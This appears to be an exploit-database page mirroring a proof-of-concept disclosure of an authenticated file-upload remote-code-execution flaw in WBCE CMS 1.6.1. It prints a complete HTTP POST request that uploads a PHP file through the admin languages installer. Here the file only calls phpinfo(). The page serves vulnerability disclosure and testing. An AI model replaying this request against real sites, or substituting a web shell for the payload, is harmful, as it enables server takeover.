Advertisement






WBCE_CMS-1.6.1 File Upload - RCE

CVE Category Price Severity
N/A CWE-434 $3,000 High
Author Risk Exploitation Type Date
mqt High Remote 2023-12-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2023120016

Below is a copy:

WBCE_CMS-1.6.1 File Upload - RCE
## Title: WBCE_CMS-1.6.1 File Upload - RCE
## Author: nu11secur1ty
## Date: 12/07/2023
## Vendor: https://wbce-cms.org/
## Software: https://github.com/WBCE/WBCE_CMS/archive/refs/tags/1.6.1.zip
## Reference: https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload

## Description:
The language module is vulnerable to file upload attacks.
The upload function is not sanitizing well and the attacker can upload a PHP malicious script, then the attacker can execute it, without any restriction execution permissions!
In this case, I execute the PHP script and create another file in the languages node in the app file system.
I am a Penetration Tester, not a stupid cracker! Thank you all!

STATUS: HIGH-CRITICAL Vulnerability
[+]Exploit execution:
```POST
POST /WBCE_CMS-1.6.1/wbce/admin/languages/install.php HTTP/1.1
Host: pwnedhost.com
Cookie: admin_auth=eyJpdiI6Ii9pK2orL0tKdUI1dGZlb3NvdDUzcmc9PSIsInZhbHVlIjoicSs5Y3RjYjFvZ0tWS3pNaS9qcHhLUldERThMeDBxQXBrRDNZaDhWQlNtb05PdmVLcnFCdWR3dXBIZDZacnFYZy9YWE1rRURFazhTNHFtckFiN0lUNENiZ0p4UVA4SmJGR2tJK1ljemc0YkF3T1R5YmNXS3M4RkpMdWxCcmV1WnhDN2FXYTA2NG9HdTBqUnRoNUt0bVh3PT0iLCJtYWMiOiJjMzFiZDk0NmY4NTM3ODBhYzJkYWVjYzU0YTJkODA1NGQ1NTM5ZmNlN2FjMTBhNWMwZmUyMWUyMDhhYWQ3ODZhIiwidGFnIjoiIn0%3D; fusion3e5d5_visited=yes; fusion99apx_visited=yes; phpsessid-6304-sid=rnqsoulnul8qmrlpvc611gf592; stElem___stickySidebarElement=%5Bid%3A0%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A1%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A2%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A3%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A4%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A5%5D%5Bvalue%3AnoClass%5D%23%5Bid%3A6%5D%5Bvalue%3AnoClass%5D%23; WBCELastConnectJS=1701936358
Content-Length: 475
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="119", "Not?A_Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: https://pwnedhost.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary757KDXm0RNB2VYkn
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.199 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://pwnedhost.com/WBCE_CMS-1.6.1/wbce/admin/languages/index.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=0, i
Connection: close

------WebKitFormBoundary757KDXm0RNB2VYkn
Content-Disposition: form-data; name="formtoken"

64d899c3-53dcaf48f90c116fc048814b8841ec276b7555c4
------WebKitFormBoundary757KDXm0RNB2VYkn
Content-Disposition: form-data; name="userfile"; filename="info.php"
Content-Type: application/octet-stream

//@nu11secur1ty
<?php
phpinfo();
?>

------WebKitFormBoundary757KDXm0RNB2VYkn
Content-Disposition: form-data; name="submit"


------WebKitFormBoundary757KDXm0RNB2VYkn--

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/help.wbce/WBCE-1.6.1)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/12/wbcecms-161-file-upload-rce.html)

## Time spent:
00:37:00


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.